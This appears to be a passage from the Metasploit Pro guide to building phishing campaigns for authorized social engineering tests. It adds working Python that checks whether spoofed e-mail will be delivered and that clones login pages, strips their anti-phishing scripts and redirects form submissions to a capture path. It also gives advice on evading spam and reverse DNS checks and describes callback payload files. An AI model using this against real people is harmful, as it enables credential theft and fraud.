In a social engineering attack, there is typically a delivery tool and an attack method. To configure a delivery tool and attack method for a social engineering attack, you use campaign components. A campaign component refers to an e-mail, web page, or portable file. It is a configurable component that you use to build a social engineering campaign. Each campaign must have at least one campaign component.

Most campaigns will have an e-mail component because it is the most commonly used delivery method for social engineering. In addition to the e-mail component, you can add web pages to build phishing scams or add portable files to create file attachment attacks. For example, you can set up a phishing attack with an e-mail component and a web page component. The e-mail component defines the header and content that you want to e-mail to a target list, and the web page component sets up the landing and redirect pages that the target visits.

E-mail
E-mail is the delivery tool that you use to send social engineering attacks to your target list. An e-mail defines the header and the content that you want the victim to read. To send e-mail, you must provide Metasploit Pro with the SMTP settings for your local mail server or a cloud-based mail delivery service. Metasploit Pro does not include a built-in mail transfer agent, so you must have access to your own mail server.

If you intend to reuse the e-mail content in other campaigns, you can create an e-mail template that predefines the content for the e-mail body. An e-mail template enables you to quickly insert content into an e-mail without having to recreate the content each time you create a campaign. After you create the e-mail template, you can apply it to an e-mail in any campaign within the project.

Tip: As a general best practice, create the e-mail component after you create the web page component. Some features that you may need, such as links to the campaign's web page, are not available if you create the e-mail first.

E-mail Options
The following options are available for you to configure for the e-mail component:

- Name - The name of the e-mail component. The name displays on the campaign component tab.
- Subject - The subject that displays in the message header and the subject line.
- From Address - The sender's e-mail address.
- From Name - The sender's display name.
- Target List - The list of targets, or recipients, that you want to receive the e-mail.

Mail Server Requirements


Before you can configure Metasploit Pro to send e-mail through a mail server, make sure that the server meets the following requirements:

- The mail server does not perform a reverse DNS lookup to verify that the IP address of the server hosting Metasploit Pro matches the domain of the e-mail address that you are trying to spoof. If the mail server performs a reverse DNS lookup, it will reject the e-mail and refuse to deliver it.
- The mail server does not perform restrictive checks for spam, malicious files, or other types of e-mail abuse. The mail server should use the lowest level of protection against spam and junk mail. Public e-mail services such as Gmail, Yahoo, and Hotmail enforce very strict controls and will most likely blacklist any e-mail that appears to be spam, so it is recommended that you do not use these services.
- If the mail server is provided through an e-mail relay service, check the terms of service for spam or bandwidth restrictions. Many of these providers monitor your account to ensure that you are not using it to abuse their service. If any of your e-mail recipients flag your e-mail as spam, this alerts the provider that you may be abusing their system and may cause them to blacklist your e-mail. Some relay providers require that you first build a reputation as a legitimate sender; otherwise, many Internet Service Providers will immediately flag your e-mail as spam. Since volume is a strong indicator of spam, keep the number of outgoing e-mails below the relay service's recommended volume.
- The SMTP port used to send mail is not blocked for the server running Metasploit Pro.

The receiving mail servers may apply their own sender checks (for example, SPF and DKIM for the spoofed domain) in addition to the checks on your outgoing server, so coordinate with the mail administrator of the target organization to allow the sending host before you launch.

Common Mail Server Errors


While attempting to send e-mail, you may encounter some errors that prevent you from successfully delivering e-mail. If you are having problems getting your mail server to deliver mail, please go to the task log and search for any text highlighted in red or any text tagged as an error. You can use the error message to help troubleshoot the issue.

No Valid Recipients
This error indicates that the domain you are trying to spoof does not match the originating IP address in a reverse DNS lookup. To work around this issue:

- Disable reverse DNS lookup on the mail server.
- Set up a proxy or IP address that enables the phishing e-mail to appear to come from a legitimate origin.

The Server Refused Our Mail


This error indicates that the mail server has flagged the e-mail as spam and refused to deliver it. To work around this issue:

- Lower your mail server's security level for unknown and untrusted senders, and lower its security level for spam.
- Use an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill. These services let their users configure the level of security enforced on outgoing mail and send bulk mail, and they are more likely to deliver e-mail reliably. However, before you decide to use an e-mail relay service, check the terms of service agreement to verify that the provider will not blacklist your e-mails if they are classified as spam.

Sender E-mail Address Does Not Match with the User Account
This error most likely results from a reverse DNS lookup that determined that the IP address of the e-mail did not match the host name that it is trying to spoof. To work around this issue:

- Disable reverse DNS lookup.
- Set up a proxy or IP address that enables the phishing e-mail to appear to come from a legitimate origin.
- Set up a local SMTP server on the server that runs Metasploit Pro. On Linux machines, you can use Sendmail or Postfix.
- Use an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill.

The Server Has Encountered a Bad Sequence of Commands


This is a general error that you may see when the e-mail server is unable to deliver e-mail. Usually, this error is followed by an additional series of messages that you can use to troubleshoot it. For example, look for the following errors:

- Sender e-mail address does not match with the user account.
- The server refused our mail.
- No valid recipients.
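Rather than discovering these replies in the task log after the campaign has started, you can rehearse the SMTP dialogue first. The following Python is an added example and not part of Metasploit Pro: smtp_preflight connects to the configured mail server, upgrades to TLS when the server offers STARTTLS, authenticates if credentials are given, issues MAIL FROM and RCPT TO for the spoofed sender and one recipient, and then sends RSET instead of DATA so nothing is queued. ptr_matches_domain checks whether the sending host's PTR record falls under the spoofed domain, which is the reverse DNS condition behind two of the errors above. preflight_verdict maps the last reply to the error names used above by step and reply code; that mapping is a heuristic of this example, because servers word their replies freely.

```python
import smtplib
import socket


def ptr_matches_domain(ptr_name, domain):
    """True if the reverse DNS name of the sending host is in the spoofed domain.

    domain may be a bare domain or a full address such as ceo@mycompany.com.
    """
    ptr = ptr_name.rstrip(".").lower()
    dom = domain.split("@")[-1].rstrip(".").lower()
    return ptr == dom or ptr.endswith("." + dom)


def reverse_dns(ip):
    """PTR lookup for the host that Metasploit Pro sends from; None if there is no PTR."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def _text(reply):
    return reply.decode("utf-8", "replace") if isinstance(reply, bytes) else str(reply)


def smtp_preflight(host, port, from_addr, rcpt_addr, username=None, password=None, timeout=10):
    """Walk the SMTP dialogue up to RCPT TO without sending a message.

    Returns a list of (step, code, reply) tuples; the last tuple is where the
    server stopped cooperating.  RSET is sent instead of DATA, so nothing is queued.
    """
    steps = []
    try:
        smtp = smtplib.SMTP(host, port, timeout=timeout)
    except OSError as exc:  # refused connection, blocked port, or timeout
        return [("connect", 0, str(exc))]
    try:
        code, reply = smtp.ehlo()
        steps.append(("ehlo", code, _text(reply)))
        if smtp.has_extn("starttls"):
            code, reply = smtp.starttls()
            steps.append(("starttls", code, _text(reply)))
            smtp.ehlo()  # capabilities must be re-read after the TLS upgrade
        if username:
            try:
                smtp.login(username, password)
                steps.append(("auth", 235, "authenticated"))
            except smtplib.SMTPAuthenticationError as exc:
                steps.append(("auth", exc.smtp_code, _text(exc.smtp_error)))
                return steps
        code, reply = smtp.mail(from_addr)
        steps.append(("mail from", code, _text(reply)))
        if code != 250:
            return steps
        code, reply = smtp.rcpt(rcpt_addr)
        steps.append(("rcpt to", code, _text(reply)))
        smtp.rset()
    except smtplib.SMTPException as exc:
        steps.append(("protocol", getattr(exc, "smtp_code", 0), str(exc)))
    finally:
        try:
            smtp.quit()
        except (smtplib.SMTPException, OSError):
            pass
    return steps


def preflight_verdict(steps):
    """Map the last reply to the error names used above (heuristic, by step and code)."""
    step, code, _ = steps[-1]
    if step == "connect":
        return "cannot reach the mail server (wrong host or SMTP port blocked)"
    if step == "auth" and code != 235:
        return "authentication failed"
    if code == 503:
        return "the server has encountered a bad sequence of commands"
    if step == "mail from" and code in (550, 553):
        return "sender e-mail address does not match with the user account"
    if step == "rcpt to" and code in (550, 553, 554):
        return "the server refused our mail / no valid recipients"
    if code in (250, 251):
        return "ok"
    return "unexpected reply %d at %s" % (code, step)


if __name__ == "__main__":
    # Placeholder values; substitute the mail server and addresses from your campaign.
    steps = smtp_preflight("mail.domain.com", 25, "ceo@mycompany.com", "alice@example.com")
    for step in steps:
        print(step)
    print(preflight_verdict(steps))
```

Run it from the host that runs Metasploit Pro, because the source IP is what the reverse DNS and relay checks look at; a verdict of "ok" from a different machine proves nothing.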


Defining Global SMTP Settings for All E-mail Based Campaigns


Global settings define the settings that projects can share, and are useful if you have information that you want to reuse in different projects. A good example of a reusable and shareable resource is a mail server. Metasploit Pro does not include a mail transfer agent, but you can configure it to connect to a locally or remotely hosted mail server by setting up the SMTP settings for that server in the global settings.

When you define the SMTP settings globally, Metasploit Pro automatically configures the e-mail server for campaigns that contain an e-mail component, and you do not need to configure any additional settings for your mail server. If there is a special case in which you do not want to use the global mail server settings, you can override them in the campaign.

1. From the main menu, select Administration > Global Settings.
2. When the Global Settings page appears, find the SMTP settings.
3. Enter the following information to configure the SMTP settings:

- Address - The fully qualified mail server address (e.g., mail.domain.com).
- Port - The port that the mail server listens on. Typically, SMTP runs on port 25; authenticated submission commonly uses port 587.
- Domain - The hosted domain name for your mail server (e.g., domain.com).
- Username - The user name that Metasploit Pro uses to authenticate to the mail server.
- Password - The password that Metasploit Pro uses to authenticate to the mail server.
- Authentication - The authentication type, which determines the login mechanism used to connect to the SMTP server.

4. Click the Update button to save the settings.

Defining SMTP Settings for a Campaign


If you have multiple mail servers that you want to use, and do not want to define a global mail server, you can define the SMTP settings on a per-campaign basis.

Note: When you set up the SMTP settings from a campaign, Metasploit Pro uses plain authentication to connect to the SMTP server. SASL PLAIN transmits the user name and password base64-encoded rather than encrypted, so treat the path to the mail server as one that must be trusted or protected by TLS.

1. From within a campaign that contains an e-mail component, click the E-mail Server button.
2. When the Configure Email Server window appears, enter the following information:

- Host - The fully qualified mail server address (e.g., mail.domain.com).
- Port - The port that SMTP runs on. Typically, SMTP runs on port 25.
- Domain - The hosted domain name for your mail server (e.g., domain.com).
- Username - The user name that Metasploit Pro uses to authenticate to the mail server.
- Password - The password that Metasploit Pro uses to authenticate to the mail server.

3. Click the Save button.

Creating an E-mail
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
3. Click the Add e-mail, web page, or portable file button.
4. Click the E-mail button.
5. When the e-mail configuration window appears, enter the following header information:

- Subject - The subject that displays in the message header and the subject line.
- From Address - The sender's e-mail address.
- From Name - The sender's name.

6. Click the Target list dropdown and choose a target list.
7. Click Next to continue to the E-mail Content window.
8. When the E-mail Content window appears, create the body for the e-mail. Choose one of the following options:

- Insert content from a template - Click the Template dropdown menu and choose the template that you want to apply.
- Create your own content - Use the plain text or rich text editor to create the e-mail body. You can insert any of the custom attributes to auto-fill the e-mail with data from the target list. For example, use the first_name attribute to insert the human target's first name in the e-mail.

9. Click Save to save the e-mail component. At any time, you can click on the Preview tab to see a generated preview of the current e-mail.

Web Page
A web page is an HTML page that a human target can access online. The web page can be an online form that solicits information or it can be a simple message to the target that they should have not opened the link. It can also be a web page that serves an exploit or file to a human target.


To design a web page, you must create the HTML code for the web page. You can create the HTML body by writing the HTML code manually or by cloning an existing web page. The easiest and recommended way to create a web page is to clone one. For example, if you want to create a spoofed website based on your company's web page, you can clone it to make a copy of the web page for your campaign. Metasploit Pro copies the HTML into the campaign, where you can edit it if there are any tweaks that you want to make.

The web page is assigned a URL, which is based on the web server that you configure for the campaign. This is the URL that you send to the human targets.

If you plan to reuse the web page in other campaigns, you can create a web page template. A web page template contains predefined and preformatted HTML content that you can use to quickly create a web page. After you create the web page template, you can apply it to a web page in any campaign within the project.

Web Page Options


The following options are available for you to configure for the web page component:

- Name - The name of the web page component.
- Path - The URL path to the web page.
- Attack Type - The social engineering attack type that the web page launches, such as a phishing attack or file format exploit.
- Content - The HTML content for the web page.
- Template - Wraps the content you define in the campaign text editor with a template you have previously created.
- Clone Website - Clones the web page content from a website.
- StripJavaScript - Removes script tags from the cloned HTML and prevents any scripts from running URL-checking code or redirecting the human target to the real site.
- Set referer - Sets the HTTP Referer header on the outgoing request for the cloned web page. Use this option if you want to clone a page that checks referers, or if you want to appear to the site administrator as a user who browsed to the page from within the site (e.g., http://www.company.com/home).
- Set user agent - Sets the User-Agent header on the outgoing request for the cloned web page. Use this option if you want the version of the website that is served to a particular browser, or if you want your request to appear to come from a normal browser.
- Resolve relative URLs - Resolves any relative URLs in the cloned HTML to absolute URLs. Since Metasploit Pro does not serve assets or images locally, links to images and files must be absolute URLs. If you clone a website, enable this option so that the URLs resolve to valid links and the page renders properly.
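The cloning options above correspond to small, mechanical transformations of the fetched HTML. The following Python is an added example and is not Metasploit Pro's own cloning code: fetch_page sends the optional Referer and User-Agent headers, strip_javascript drops script blocks and inline event handlers (the StripJavaScript behaviour), resolve_relative_urls rewrites href, src, and action attributes against the source URL so that images and stylesheets still load from the real site, and point_forms_at sends the cloned form to the campaign path so that submissions are captured. The regular expressions are adequate for typical login pages but are not a full HTML parser. SAMPLE_HTML is a constructed page, and the capture path /support is an assumption.

```python
import re
from urllib.parse import urljoin
from urllib.request import Request, urlopen

_SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
_ON_ATTR_RE = re.compile(r"\s+on[a-z]+\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", re.IGNORECASE)
_URL_ATTR_RE = re.compile(r"(\b(?:href|src|action)\s*=\s*)([\"']?)([^\"'\s>]+)(\2)", re.IGNORECASE)
_FORM_ACTION_RE = re.compile(r"(<form\b[^>]*\baction\s*=\s*)([\"']?)[^\"'\s>]*\2", re.IGNORECASE)


def fetch_page(url, referer=None, user_agent=None):
    """Retrieve the page to clone; the optional headers mirror Set referer and Set user agent."""
    headers = {}
    if referer:
        headers["Referer"] = referer
    if user_agent:
        headers["User-Agent"] = user_agent
    with urlopen(Request(url, headers=headers), timeout=15) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


def strip_javascript(html):
    """Drop <script> blocks and inline on* handlers so the clone cannot run
    URL checks or bounce the visitor to the real site."""
    html = _SCRIPT_RE.sub("", html)
    return _ON_ATTR_RE.sub("", html)


def resolve_relative_urls(html, base_url):
    """Make every href/src/action absolute so assets still load from the real
    site, because the campaign web server does not host them."""
    def fix(match):
        prefix, quote, value, _ = match.groups()
        if value.startswith(("#", "javascript:", "data:", "mailto:")):
            return match.group(0)
        return "%s%s%s%s" % (prefix, quote, urljoin(base_url, value), quote)
    return _URL_ATTR_RE.sub(fix, html)


def point_forms_at(html, capture_path):
    """Rewrite form actions to the campaign path so submissions reach the
    phishing page.  A form without an action already posts to the page URL."""
    return _FORM_ACTION_RE.sub(
        lambda m: "%s%s%s%s" % (m.group(1), m.group(2), capture_path, m.group(2)), html)


def clone_for_campaign(html, source_url, capture_path, strip_js=True):
    """Apply the transformations in the order the options imply."""
    if strip_js:
        html = strip_javascript(html)
    html = resolve_relative_urls(html, source_url)
    return point_forms_at(html, capture_path)


# Constructed sample login page standing in for the cloned HTML (not a real site).
SAMPLE_HTML = """<html><head>
<script>if (location.host != "www.company.com") location = "https://www.company.com/";</script>
<link rel="stylesheet" href="/static/site.css">
</head><body onload="checkReferrer()">
<img src="images/logo.png">
<form action="/login" method="post">
<input name="user"><input name="pass" type="password"><input type="submit">
</form></body></html>"""

if __name__ == "__main__":
    print(clone_for_campaign(SAMPLE_HTML, "https://www.company.com/login", "/support"))
```

The sample page carries the two defences the StripJavaScript option exists for: a script that redirects any copy served from the wrong host, and an onload handler that checks the referer. Both are gone in the output, while the stylesheet and logo still point at the real site and the form posts to the campaign path.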

Web Page

363

Creating a Web Page


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
3. Click the Add e-mail, web page, or portable file button.
4. Click the Web Page button.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URL path name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URL is http://www.mycompany.com/support.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:

• Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
• Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.

9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:

• Apply a web page template - To apply a web page template, click the Template dropdown and choose the template that you want to apply to the web page. When you apply a template, Metasploit Pro uses the predefined content to create the web page.
• Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page.
• Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain a web form. For example, web pages that have login fields or prompt the user for sensitive information are good web pages to clone.

11. When you finish adding the web page content, click the Save button to save the web page component.

Cloning an Existing Web Page


1. From within a project, click the Campaigns tab.

2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.

3. Click the Add e-mail, web page, or portable file button.

4. Click the Web Page button.

5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URL path name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URL is http://www.mycompany.com/support.

6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.

7. Click the Attack Type dropdown and choose a social engineering attack method.

9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, click the Clone Website button.
11. Enter the URL of the web page that you want to clone in the URL to clone field.
12. Choose any of the following options to customize the cloned web page:

• Strip Javascript - Removes JavaScript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site.
• Set referer - Sets the HTTP referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the site's administrator as a user that browsed to the website (e.g., http://www.company.com/home).
• Set user agent - Sets the user agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser.
• Resolve relative URLs - Resolves any relative URLs to absolute URLs in the cloned HTML. This option is selected by default.

13. Click the Clone button. Metasploit Pro copies the HTML from the web page and displays it in the Content window.
14. Click the Save button to save the web page component.

Redirect Pages
A redirect page is the web page that you forward the human target to after they submit data on a phishing site. A redirect page can be a simple web page that displays a warning message to the human target, or it can redirect the human target to another web form. For example, the redirect page can display a security warning like "This was a social engineering test. Please do not open any e-mails from sources that you do not trust." Additionally, a redirect page can be a web page that delivers an exploit, runs Browser Autopwn, or serves a Java signed applet to the human target. If you intend to use a redirect page in your campaign, you must create it before you create the landing page that the human target initially visits. If you do not create the redirect page first, you will not be able to set a redirect page for the landing page. To create a redirect page, you use the same steps as you would to create a regular web page.

Portable File
A portable file refers to an executable file or file format exploit that you can save to an external storage device. You create portable files when you want to send a malicious file to a human target using a delivery method other than e-mail. Portable files are most commonly used in USB key drops, but you can also save them to CD-ROMs or any other storage device. A portable file is a campaign component and is created as part of a campaign. The portable file component generates a downloadable file that contains an embedded payload. The delivered payload establishes the connection between the victim's machine and the attacking machine.

Portable File Options


The following options are available for you to configure for the portable file component:

• Name - The name of the USB key component.
• Listener Callback IP - The IP address that the attacking machine uses to listen for a connection.
• Listener Callback Port - The port that the attacking machine uses to listen for a connection.
• Payload Type - The type of payload that the executable file delivers to the target.
• Filename - The name for the executable file that Metasploit Pro creates.

Limit on Portable File Components


There is no limit on the number of portable files that you can have as part of a campaign.

Listening Port Distribution


Metasploit Pro systematically assigns the LPORT so that a port conflict does not occur between the portable file components. When you create the portable file component, Metasploit Pro searches through ports 1,024-65,535 to identify ports that are available. It automatically assigns the first available port that it finds to the portable file component and blocks off that port so that it does not reassign the same port.
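The allocation rule described above, written out as an added example (this is not Metasploit Pro code; the class name and the constructed list of ports already in use are assumptions for illustration):

```ruby
# Added example, not Metasploit Pro code: a minimal allocator that mirrors the
# listener-port distribution described above. Each portable file component is
# given the first free port in 1024-65535, and that port is then reserved so a
# later component in the same campaign cannot be handed the same LPORT.
require 'set'

class ListenerPortAllocator
  PORT_RANGE = (1024..65_535).freeze

  # in_use: ports already taken by other components or local services.
  # This is constructed input for the example, not read from the system.
  def initialize(in_use = [])
    @reserved = Set.new(in_use)
  end

  # Returns the first available port and reserves it, or nil when the whole
  # range is exhausted (no port is handed out twice).
  def allocate
    port = PORT_RANGE.find { |p| !@reserved.include?(p) }
    @reserved << port if port
    port
  end

  # Releases a port, e.g. when the component that used it is deleted.
  def release(port)
    @reserved.delete(port)
  end

  def reserved?(port)
    @reserved.include?(port)
  end
end

# Three portable file components created in sequence, with 1024 and 1025
# already taken (constructed sample state).
if __FILE__ == $PROGRAM_NAME
  alloc = ListenerPortAllocator.new([1024, 1025])
  3.times { puts alloc.allocate } # 1026, 1027, 1028
end
```

The reservation set is what prevents two components from sharing a callback port; releasing a port only happens explicitly, which matches the guide's statement that an assigned port is blocked off rather than recycled automatically.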

Creating a Portable File


1. From within a project, click the Campaigns tab.

2. When the Manage Campaigns page appears, click the Configure a Campaign tab.

Portable File

369

3. In the Name field, enter a descriptive name for the campaign. For example, USB-PayrollEXE helps you quickly identify the campaign type and the executable file name.
4. Select the Custom Campaign setup.

5. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears.

6. Click the Portable File button.

7. When the Portable File configuration window appears, enter the following information:

• Component name - The name of the campaign component. This name displays under the portable file button on the campaign configuration page.
• File name - The name of the file that Metasploit Pro generates for you. The file name should include the file extension. If you do not supply the correct extension for the file, the exploit will not run on the target's machine.

8. Choose one of the following portable file types:

• Executable file - Metasploit Pro generates an executable file that delivers the generic payload handler (exploit/multi/handler) to the human target. No further action is needed if you choose to generate an executable file. Click Save to save the component configuration and to exit the configuration window.
• File format exploit - Metasploit Pro generates a malicious file for you to deliver the exploit to the human target. If you choose to generate a file format exploit, the Module Search page will appear. You will need to search for the module that you want to use and configure the settings for the exploit. Save the module configuration and the portable file component configuration when you are done.

9. Save the campaign when you are done.

Downloading a Portable File


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, find the campaign that contains the executable file that you want to download.
3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign.
4. Locate the component that contains the file that you want to download.
5. Click the Download link.
6. Save the file to a location on your machine.

Renaming the Portable File


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, find the campaign that you want to edit.
3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign.
4. Find the portable file component that you want to rename and click on the button.
5. When the Portable file configuration window appears, enter the new name for the portable file in the Name field.
6. Click Save to save your changes.

Reusable Campaign Resources


A reusable campaign resource is a reusable file that you can share across campaigns that are in the same project. It refers to a web page template, e-mail template, or target list. The following sections describe the different types of reusable campaign resources.

Target Lists
A target list defines the human targets that you want to send the social engineering e-mail to. You can either manually create the target list from within a campaign or you can import a CSV of targets. A target list is project specific and is only accessible to the campaigns that are part of the project.

Creating a Target List


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, click the Manage Reusable Resources tab.

3. Click the New Target List button.

4. When the Upload Target List page appears, enter a name for the target list in the List Name field.

Reusable Campaign Resources

372

5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add.

6. Click the Add (+) button to continue to add additional human targets.
7. When you are done, click the Save button.

Creating a CSV File of Human Targets


To create a CSV file of human targets, you can use a text editor or spreadsheet editor. The CSV file must define the header row and the contact information for each human target. Each row of data must contain comma separated values, and each line of data must be separated by a line break. The header row that you must include in the CSV file is email_address,first_name,last_name.

Creating a CSV with a Text Editor


1. Open a text editor like Notepad.
2. Add the header row: email_address,first_name,last_name.
email_address,first_name,last_name
3. Next, enter the text data that you want the file to contain. The data must follow the same format as the header: e-mail address, first name, and last name. Remember to use a comma to separate each field.
email_address,first_name,last_name
jsmith@metasploit.com,john,smith
4. Separate each row with a new line.
email_address,first_name,last_name
jsmith@metasploit.com,john,smith
dthomas@metasploit.com,dean,thomas
5. Save the file when you are done.

Target Lists

373

Creating a CSV with a Spreadsheet Editor


1. Open a spreadsheet editor, like Microsoft Excel.
2. Add the following column headers: email_address, first_name, and last_name.
3. Add the e-mail address, first name, and last name for each human target to a row in the spreadsheet. The information for each human target needs to be on a separate row.
4. When you are done, save the spreadsheet as a CSV file.
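Whichever editor you use, the file that Metasploit Pro expects has the layout shown above. The following added example (not Metasploit Pro code) builds a target list in that layout and validates a file before it is imported, so a header typo or a malformed address is caught up front rather than producing a partial import. The function names are assumptions; the sample rows reuse the guide's own entries plus one constructed bad row.

```ruby
# Added example, not Metasploit Pro code: build and validate a target list CSV
# using the header row the guide requires: email_address,first_name,last_name.
require 'csv'

REQUIRED_HEADER = %w[email_address first_name last_name].freeze

# Builds CSV text from an array of { email:, first:, last: } hashes. CSV.generate
# quotes any field that contains a comma, so names like "Smith, Jr." stay intact.
def build_target_csv(targets)
  CSV.generate do |csv|
    csv << REQUIRED_HEADER
    targets.each { |t| csv << [t[:email], t[:first], t[:last]] }
  end
end

# Parses CSV text and returns [targets, errors]. The header must match exactly;
# rows with a malformed e-mail address or a missing name are reported with their
# line number instead of being imported.
def parse_target_csv(text)
  rows = CSV.parse(text, skip_blanks: true)
  header = rows.first
  unless header == REQUIRED_HEADER
    return [[], ["header must be #{REQUIRED_HEADER.join(',')}"]]
  end

  targets = []
  errors = []
  rows.drop(1).each_with_index do |row, i|
    line = i + 2 # line 1 is the header
    email, first, last = row.map { |v| v.to_s.strip }
    if email !~ /\A[^@\s]+@[^@\s]+\.[^@\s]+\z/
      errors << "line #{line}: invalid e-mail address #{email.inspect}"
    elsif first.empty? || last.empty?
      errors << "line #{line}: first_name and last_name are required"
    else
      targets << { email: email, first: first, last: last }
    end
  end
  [targets, errors]
end

# Constructed sample file: the guide's two rows plus one malformed row.
SAMPLE_CSV = <<~TEXT
  email_address,first_name,last_name
  jsmith@metasploit.com,john,smith
  dthomas@metasploit.com,dean,thomas
  not-an-address,,
TEXT

if __FILE__ == $PROGRAM_NAME
  targets, errors = parse_target_csv(SAMPLE_CSV)
  puts "#{targets.length} targets imported, #{errors.length} rejected"
  errors.each { |e| puts e }
end
```

Running the block on the sample reports two imported targets and one rejected line; round-tripping the parsed targets through build_target_csv reproduces a file with the required header.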

Importing a Target List


1. From within a project, click on the Campaigns tab.
2. When the Campaigns page appears, click on the Manage Reusable Resources tab.
3. Click the Resource dropdown and choose Target Lists.
4. Click the New Target List button.
5. When the Upload Target List page appears, click the Browse button.
6. Navigate to the location of the CSV file.
7. Select the CSV file and click the Open button.
8. Click the Save button.

Adding a Target to a Target List


1. From within a project, click on the Campaigns tab.
2. When the Campaign page appears, click on the Manage Reusable Resources tab.
3. When the Resources page appears, click the Resources dropdown and select Target Lists.
4. Click on the target list that you want to edit.
5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add.
6. Click the Add (+) button to continue to add additional human targets.
7. When you are done, click the Submit button.

Deleting a Target List


1. From within a project, click on the Campaigns tab.
2. When the Campaigns page appears, click on the Manage Reusable Resources tab.
3. When the Resources page appears, click on the Resource dropdown and choose Target Lists.
4. Select the target list that you want to delete.

5. Click the Delete button.
6. Click OK to confirm that you want to delete the target list.

Templates
A template is a preformatted and reusable set of content you can apply to an e-mail or web page. It is essentially a wrapper that wraps around the web page or e-mail content. You can use a template to instantly add content or formatting to a web page or e-mail. A template is project specific and cannot be accessed globally.

Web Templates
A web template defines optional pre-existing HTML code that you can use to wrap around the content of a web page component. Typically, a web template defines stylistic design elements and generic information that you can tailor to a specific target when you build the actual web page. The purpose of a web template is to provide reusable presentation logic that you can share between campaigns that are part of the same project. For example, if you intend to use a spoofed version of your company's web page for the majority of your campaigns, you should create a web template of your company's site. This enables you to quickly build a web page based on an existing template and customize the web page according to your needs.

Web Template Requirements


When you create the web template, the body must contain the {{ web_page_content }} attribute, which inserts the content that you create in the actual web page component into the web page. If the web template does not contain the {{ web_page_content }} attribute, you will not be able to save the web template.

Creating a New Web Page Template


1. From within a project, click the Campaigns tab.
2. When the Campaigns page appears, click the Manage Reusable Resources tab.
3. From the Resources dropdown, select Web Templates and click the New Web Template button.
4. When the New Web Template page appears, enter a name for the template in the Name field.
5. In the content editor, enter the HTML that you want the web template to use. By default, Metasploit Pro defines the DOCTYPE declaration for you:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Templates

375

6. When you create the HTML, you need to make sure that the web page includes the <html> tag to indicate the start of the web page and the </html> tag to denote the end of the web page. By default, the web template includes the <head> element.
7. Additionally, you need to define the title for the web page. By default, the title is Metasploit Pro Social Engineering Web Page. To replace the title with your own title, find the <title> element and replace the text inside the <title> element with the title of your web page.
8. When you are ready to create the body of the web page, find the <body> element. The majority of the information for the web page will be defined in the <body> element. For example, you can define the background color and web page text.
9. When you are ready to insert the content from the web page component into the template, click the Insert Custom Attribute dropdown, and select the Web Page Content attribute. This adds the {{ web_page_content }} tag, which denotes that the content from the web page component should be placed there.
10. When you finish creating the web template, click the Save button.

Creating a Web Page Template from an Existing Web Page


1. From within a project, click the Campaigns tab.
2. Click the Manage Reusable Resources tab.
3. From the Resources dropdown, select Web Templates and click the New Web Template button.
4. When the New Web Template page appears, enter a name for the template in the Name field.
5. Click the Clone Website button.
6. When the Clone Website window appears, enter the URL to the web page that you want to clone in the URL to clone field.
7. Click the Clone button. Metasploit Pro copies the HTML from the web page and imports it into the content editor. At this point, you can make any additional customizations you want to the HTML. For example, you may want to tweak the look and feel of the web page so that it is obvious to the human target that the web page is a spoofed site.
8. When you are done with your modifications, you need to find a place in the <body> element to insert the Web Page Content attribute. This attribute adds the {{ web_page_content }} tag, which denotes that the content from the web page component should be placed there. To insert the Web Page Content attribute, click the Insert Custom Attribute dropdown, and select the Web Page Content attribute.
9. Click the Save button to save the template.

Applying a Web Page Template


1. From within a project, click the Campaigns tab.
2. Either create a new campaign or open an existing campaign to edit it.

3. From the campaign configuration page, add a web page component to the campaign.
4. When the web page configuration page appears, click the Web Page button.
5. When the web page configuration page appears, add the web page ID to the URL path.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:

• Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
